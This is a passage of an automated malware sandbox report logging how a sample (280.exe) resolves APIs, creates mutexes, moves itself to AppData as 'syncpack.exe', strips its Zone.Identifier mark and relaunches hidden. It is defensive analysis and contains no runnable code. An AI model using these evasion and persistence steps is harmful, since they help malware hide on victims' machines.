Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x18fc8c True 1
Fn
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x771eae5f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x77c0e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeConsole, address_out = 0x76066aa8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75fc5a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpA, address_out = 0x75fdeceb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x75fc110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x75fc14e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x75fc14c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75fc1809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x75fc11f8 True 1
Fn
System (326)
»
Operation Additional Information Success Count Logfile
Get Time type = Ticks, time = 192162 True 3
Fn
Get Time type = Ticks, time = 192177 True 87
Fn
Get Time type = Ticks, time = 192193 True 66
Fn
Get Time type = Ticks, time = 192208 True 22
Fn
Get Time type = Ticks, time = 192224 True 71
Fn
Get Time type = Ticks, time = 195672 True 1
Fn
Get Time type = Ticks, time = 195687 True 4
Fn
Get Time type = Ticks, time = 195703 True 12
Fn
Get Time type = Ticks, time = 195718 True 11
Fn
Get Time type = Ticks, time = 195734 True 1
Fn
Get Info type = Operating System True 48
Fn
Mutex (2)
»
Operation Additional Information Success Count Logfile
Create mutex_name = PEMA08 True 1
Fn
Create mutex_name = PEMB40 True 1
Fn
Process #4: 280.exe
617 0
»
Information Value
ID #4
File Name c:\users\kft6utqw\appdata\local\temp\280.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:02:19, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:02:49
OS Process Information
»
Information Value
PID 0xb50
Parent PID 0xb40 (c:\users\kft6utqw\appdata\local\temp\280.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B54
0x B58
0x B5C
0x B60
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable True False False -
private_0x0000000000220000 0x00220000 0x0022cfff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000230000 0x00230000 0x0023cfff Private Memory Readable, Writable True False False -
private_0x0000000000240000 0x00240000 0x0025ffff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000260000 0x00260000 0x0026ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000260000 0x00260000 0x00267fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000260000 0x00260000 0x0029ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000270000 0x00270000 0x00277fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000002a0000 0x002a0000 0x002a0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000002b0000 0x002b0000 0x002c9fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000002b0000 0x002b0000 0x002b1fff Pagefile Backed Memory Readable True False False -
windowsshell.manifest 0x002c0000 0x002c0fff Memory Mapped File Readable False False False -
pagefile_0x00000000002c0000 0x002c0000 0x002c0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000002d0000 0x002d0000 0x002d1fff Pagefile Backed Memory Readable True False False -
private_0x00000000002e0000 0x002e0000 0x0031ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000320000 0x00320000 0x00320fff Pagefile Backed Memory Readable True False False -
private_0x0000000000330000 0x00330000 0x003affff Private Memory Readable, Writable True False False -
pagefile_0x00000000003b0000 0x003b0000 0x003b6fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000003c0000 0x003c0000 0x003c1fff Pagefile Backed Memory Readable, Writable True False False -
cversions.1.db 0x003d0000 0x003d3fff Memory Mapped File Readable True False False -
cversions.2.db 0x003d0000 0x003d3fff Memory Mapped File Readable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x003e0000 0x003fefff Memory Mapped File Readable True False False -
280.exe 0x00400000 0x0041afff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000000420000 0x00420000 0x0051ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000520000 0x00520000 0x00520fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000530000 0x00530000 0x0056ffff Private Memory Readable, Writable True False False -
cversions.2.db 0x00570000 0x00573fff Memory Mapped File Readable True False False -
pagefile_0x0000000000580000 0x00580000 0x00580fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000590000 0x00590000 0x0059ffff Private Memory Readable, Writable True False False -
private_0x00000000005b0000 0x005b0000 0x006affff Private Memory Readable, Writable True False False -
pagefile_0x00000000006b0000 0x006b0000 0x00837fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000840000 0x00840000 0x009c0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000009d0000 0x009d0000 0x01dcffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01dd0000 0x0209efff Memory Mapped File Readable False False False -
private_0x00000000020a0000 0x020a0000 0x022affff Private Memory Readable, Writable True False False -
pagefile_0x00000000020a0000 0x020a0000 0x0217efff Pagefile Backed Memory Readable True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000a.db 0x02180000 0x021affff Memory Mapped File Readable True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x021b0000 0x02215fff Memory Mapped File Readable True False False -
private_0x0000000002270000 0x02270000 0x022affff Private Memory Readable, Writable True False False -
private_0x00000000022b0000 0x022b0000 0x023affff Private Memory Readable, Writable True False False -
pagefile_0x00000000023b0000 0x023b0000 0x027a2fff Pagefile Backed Memory Readable True False False -
private_0x00000000027b0000 0x027b0000 0x028affff Private Memory Readable, Writable True False False -
rasman.dll 0x6c9a0000 0x6c9b4fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74380000 0x743a0fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x743c0000 0x743cdfff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x743d0000 0x744c4fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74720000 0x7472afff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74d60000 0x74db1fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x752b0000 0x752c6fff Memory Mapped File Readable, Writable, Executable False False False -
wtsapi32.dll 0x75420000 0x7542cfff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75870000 0x759a5fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x759b0000 0x759d6fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75af0000 0x75b24fff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x75b30000 0x75b41fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x760c0000 0x7625cfff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76420000 0x76464fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x772c0000 0x773b4fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x77450000 0x7764afff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77bb0000 0x77bb5fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 104.00 KB MD5: bc1a4dc38f3236982d47496a1151f33f
SHA1: d112719238664d7996048614d75db8a67fc50fc5
SHA256: 85f328a811ca9f10ad82bc3c68d3c348cb069d8378400bf191bb515a6aa63473
False
Host Behavior
File (11)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe type = size True 1
Fn
Get Info C:\ type = file_attributes True 1
Fn
Get Info C:\Users\ type = file_attributes True 1
Fn
Get Info C:\Users\kFT6uTQW\ type = file_attributes True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\ type = file_attributes True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\ type = file_attributes True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\ type = file_attributes True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\ type = file_attributes True 1
Fn
Move C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe source_filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe True 1
Fn
Delete C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe:Zone.Identifier - False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe os_pid = 0xb64, show_window = SW_HIDE True 1
Fn
Module (23)
»
Operation Module Additional Information Success Count Logfile
Load USER32.dll base_address = 0x771c0000 True 1
Fn
Load KERNEL32.dll base_address = 0x75fb0000 True 1
Fn
Load advapi32.dll base_address = 0x77740000 True 1
Fn
Load crypt32.dll base_address = 0x76260000 True 1
Fn
Load wtsapi32.dll base_address = 0x75420000 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x18fc4c True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x18fc8c True 1
Fn
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x771eae5f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x77c0e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeConsole, address_out = 0x76066aa8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75fc5a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpA, address_out = 0x75fdeceb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x75fc110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x75fc14e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x75fc14c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75fc1809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x75fc11f8 True 1
Fn
Create Mapping C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Map C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe process_name = c:\users\kft6utqw\appdata\local\temp\280.exe, desired_access = FILE_MAP_READ True 1
Fn
Service (1)
»
Operation Additional Information Success Count Logfile
Open Manager database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
System (576)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XABNCPUWKW True 1
Fn
Get Time type = Ticks, time = 195843 True 31
Fn
Get Time type = Ticks, time = 195859 True 8
Fn
Get Time type = Ticks, time = 195874 True 24
Fn
Get Time type = Ticks, time = 195890 True 63
Fn
Get Time type = Ticks, time = 195906 True 22
Fn
Get Time type = Ticks, time = 195921 True 26
Fn
Get Time type = Ticks, time = 195937 True 29
Fn
Get Time type = Ticks, time = 195952 True 46
Fn
Get Time type = Ticks, time = 198183 True 7
Fn
Get Time type = Ticks, time = 198199 True 8
Fn
Get Time type = Ticks, time = 198214 True 29
Fn
Get Time type = Ticks, time = 198230 True 93
Fn
Get Time type = Ticks, time = 198246 True 77
Fn
Get Time type = Ticks, time = 198261 True 60
Fn
Get Time type = Ticks, time = 198308 True 2
Fn
Get Time type = Ticks, time = 198558 True 1
Fn
Get Info type = Operating System True 48
Fn
Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Mutex (4)
»
Operation Additional Information Success Count Logfile
Create mutex_name = PEMB40 True 1
Fn
Create mutex_name = Global\I78B0A7D7 True 1
Fn
Create mutex_name = Global\M78B0A7D7 True 1
Fn
Release mutex_name = Global\I78B0A7D7 True 1
Fn
Process #5: syncpack.exe
346 0
»
Information Value
ID #5
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:02:21, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:02:47
OS Process Information
»
Information Value
PID 0xb64
Parent PID 0xb50 (c:\users\kft6utqw\appdata\local\temp\280.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B68
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable True False False -
private_0x0000000000220000 0x00220000 0x0022cfff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000230000 0x00230000 0x0023cfff Private Memory Readable, Writable True False False -
private_0x0000000000240000 0x00240000 0x0025ffff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000260000 0x00260000 0x0026ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000260000 0x00260000 0x00267fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000270000 0x00270000 0x00277fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000320000 0x00320000 0x0032ffff Private Memory Readable, Writable True False False -
private_0x0000000000330000 0x00330000 0x003affff Private Memory Readable, Writable True False False -
wi 0x00400000 0x0041afff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000420000 0x00420000 0x005a7fff Pagefile Backed Memory Readable True False False -
private_0x00000000005b0000 0x005b0000 0x006affff Private Memory Readable, Writable True False False -
pagefile_0x00000000006b0000 0x006b0000 0x00830fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000840000 0x00840000 0x01c3ffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01c40000 0x01f0efff Memory Mapped File Readable False False False -
rasman.dll 0x6c9a0000 0x6c9b4fff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74d60000 0x74db1fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75af0000 0x75b24fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77bb0000 0x77bb5fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe os_pid = 0xb70, creation_flags = CREATE_HIGH_PRIORITY_CLASS, show_window = SW_HIDE True 1
Fn
Module (19)
»
Operation Module Additional Information Success Count Logfile
Load USER32.dll base_address = 0x771c0000 True 1
Fn
Load KERNEL32.dll base_address = 0x75fb0000 True 1
Fn
Get Filename - process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x18fc4c True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x18fc8c True 1
Fn
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x771eae5f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x77c0e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeConsole, address_out = 0x76066aa8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75fc5a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpA, address_out = 0x75fdeceb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x75fc110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x75fc14e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x75fc14c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75fc1809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x75fc11f8 True 1
Fn
System (324)
»
Operation Additional Information Success Count Logfile
Get Time type = Ticks, time = 198667 True 40
Fn
Get Time type = Ticks, time = 198682 True 65
Fn
Get Time type = Ticks, time = 198698 True 53
Fn
Get Time type = Ticks, time = 198714 True 51
Fn
Get Time type = Ticks, time = 198729 True 40
Fn
Get Time type = Ticks, time = 202411 True 10
Fn
Get Time type = Ticks, time = 202426 True 13
Fn
Get Time type = Ticks, time = 202442 True 4
Fn
Get Info type = Operating System True 48
Fn
Mutex (2)
»
Operation Additional Information Success Count Logfile
Create mutex_name = PEMB50 True 1
Fn
Create mutex_name = PEMB64 True 1
Fn
Process #6: syncpack.exe
2216 37
»
Information Value
ID #6
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:02:25, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:02:43
OS Process Information
»
Information Value
PID 0xb70
Parent PID 0xb64 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B74
0x B88
0x B94
0x B98
0x B9C
0x BA4
0x BDC
0x 568
0x 878
0x 86C
0x 868
0x 864
0x 860
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable True False False -
private_0x0000000000220000 0x00220000 0x0022cfff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000230000 0x00230000 0x0023cfff Private Memory Readable, Writable True False False -
private_0x0000000000240000 0x00240000 0x0025ffff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000260000 0x00260000 0x002dffff Private Memory Readable, Writable True False False -
private_0x00000000002e0000 0x002e0000 0x002effff Private Memory Readable, Writable True False False -
